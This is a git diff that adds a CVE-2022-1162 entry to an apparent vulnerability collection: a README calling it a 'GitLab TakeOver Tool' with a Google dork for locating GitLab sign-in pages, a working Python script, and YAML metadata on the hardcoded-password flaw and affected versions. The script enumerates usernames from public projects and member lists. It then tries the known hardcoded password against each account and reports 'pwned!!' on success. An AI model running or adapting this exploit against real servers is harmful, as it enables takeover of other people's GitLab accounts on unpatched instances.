diff --git a/cve/gitlab/2022/CVE-2022-1162/README.md b/cve/gitlab/2022/CVE-2022-1162/README.md new file mode 100644 index 0000000000000000000000000000000000000000..55c8d3484a4420e70b1c33c57e655f35a902f6b0 --- /dev/null +++ b/cve/gitlab/2022/CVE-2022-1162/README.md @@ -0,0 +1,21 @@ +# CVE-2022-1162 + +A GitLab TakeOver Tool + +A simple tool to enumerate users in gitlab and login using CVE-2022-1162 + + + +### Google Dork +intitle:"Sign in · GitLab" + + +_____________ + +### Cmd +python code.py https://url.com + +_____________ + + +Pull Requests are Welcome! diff --git a/cve/gitlab/2022/CVE-2022-1162/code.py b/cve/gitlab/2022/CVE-2022-1162/code.py new file mode 100644 index 0000000000000000000000000000000000000000..c2a6ffee025fc59778cffcfdbca3c3ed456c7445 --- /dev/null +++ b/cve/gitlab/2022/CVE-2022-1162/code.py @@ -0,0 +1,103 @@ + +''' + /$$ /$$ +|__/ | $$ + /$$ /$$$$$$ /$$$$$$$| $$$$$$$ /$$$$$$ /$$ /$$ /$$$$$$$ /$$$$$$ +| $$ /$$__ $$ /$$_____/| $$__ $$ /$$__ $$| $$ | $$| $$__ $$ /$$__ $$ +| $$| $$ \ $$| $$$$$$ | $$ \ $$| $$ \__/| $$ | $$| $$ \ $$| $$ \ $$ +| $$| $$ | $$ \____ $$| $$ | $$| $$ | $$ | $$| $$ | $$| $$ | $$ +| $$| $$$$$$$/ /$$$$$$$/| $$$$$$$/| $$ | $$$$$$/| $$ | $$| $$$$$$/ +|__/| $$____/ |_______/ |_______/ |__/ \______/ |__/ |__/ \______/ + | $$ + | $$ + |__/ + +CVE-2022-1162 TAKEOVER TOOL +''' + +from bs4 import BeautifulSoup, SoupStrainer +import httplib2 +import urllib +import re +import sys +import json + + +takeoverpassword = '123qweQWE!@#000000000' +http = httplib2.Http() + +def get_xrsf(url): + endpoint = url + '/' + keyword = 'authenticity_token' + status, response = http.request(endpoint) + + for link in BeautifulSoup(response, 'html.parser', parse_only=SoupStrainer('input')): + if link.get('name') and keyword in link.get('name'): + return {'code': str(link.get('value')), 'cookies': str(status['set-cookie'])} + return False + +def req(url): + print('Exploring...') + endpoint = url + '/explore' + keyword = 'text-plain' + status, response = http.request(endpoint) + for link in BeautifulSoup(response, 'html.parser', parse_only=SoupStrainer('a')): + if link.get('class') and keyword in link.get('class'): + members(url, link.get('href')) + +def members(url, endpoint): + print("Finding members in project: ", endpoint) + endpoint = url +endpoint + '/-/project_members' + + status, response = http.request(endpoint) + for link in BeautifulSoup(response.decode(), 'html.parser', parse_only=SoupStrainer('div', {'class': "js-project-members-list-app"})): + users = json.loads(link.get('data-members-data'))["user"]["members"] + + for user in users: + user = user["user"]["username"] + print('Member id found:' ,user, 'trying login') + login(url, user, takeoverpassword) + + for link in BeautifulSoup(response.decode(), 'html.parser', parse_only=SoupStrainer('div', {'class': "js-project-members-list"})): + users = json.loads(link.get('data-members-data'))["members"] + for user in users: + user = user["user"]["username"] + print('Member id found:' ,user, 'trying login') + login(url, user, takeoverpassword) + + for link in BeautifulSoup(response, 'html.parser', parse_only=SoupStrainer('a')): + if link.get('class') and 'js-user-link' in link.get('class'): + user = re.findall("\d+", link.get('href'))[0] + print('Member id found:' ,user, 'trying login') + login(url, user, takeoverpassword) + +def login(url, username, password): + url_login = url + '/users/sign_in' + respxrsf = get_xrsf(url) + code = respxrsf["code"] + cookies = respxrsf["cookies"] + data = { + 'utf8':'✓', + 'authenticity_token':code, + 'user[login]':username, + 'user[password]':password, + 'user[remember_me]': 0 + + } + headers = {'Cookie': cookies, 'Content-type': 'application/x-www-form-urlencoded'} + + req = http.request(url_login, + method="POST", + headers=headers, + body=urllib.parse.urlencode(data))[1] + if 'invalid login or password' not in req.decode().lower(): + print(req.decode()) + print(url, username, password, 'pwned!!') + else: + print(url, username, 'wrong') + + +if __name__ == '__main__': + url = sys.argv[1] + print("Url selected: ", sys.argv[1]) + req(url) \ No newline at end of file diff --git a/cve/gitlab/2022/yaml/CVE-2022-1162.yaml b/cve/gitlab/2022/yaml/CVE-2022-1162.yaml new file mode 100644 index 0000000000000000000000000000000000000000..7d7575e2c31bb5d68106ca8acc26709ec971e314 --- /dev/null +++ b/cve/gitlab/2022/yaml/CVE-2022-1162.yaml @@ -0,0 +1,22 @@ +id: CVE-2022-1162 +source: https://github.com/ipsBruno/CVE-2022-1162 +info: + name: GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。 + severity: critical + description: | + GitLab中通过OmniAuth供应商(如OAuth,LDAP,SAML)注册的账号设置了硬编码的口令,这可能导致攻击者直接接管账号。 + scope-of-influence: + 14.7 <= GitLab(CE/EE)< 14.7.7 + 14.8 <= GitLab(CE/EE)< 14.8.5 + 14.9 <= GitLab(CE/EE)< 14.9.2 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2022-1162 + - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-1162.json + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-1162 + cwe-id: CWE-798 + cnvd-id: None + kve-id: None + tags: UseOfHardCodedPassword,cve2022,gitlab \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 323454b7beb22c218ff26e79627829ece37c6ab0..589cd6d0dbd58611f30d5c30429217857d1d31f5 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -21,6 +21,7 @@ cve: - CVE-2023-22809 gitlab: - CVE-2021-22205 + - CVE-2022-1162 confluence: - CVE-2019-3396 - CVE-2021-26084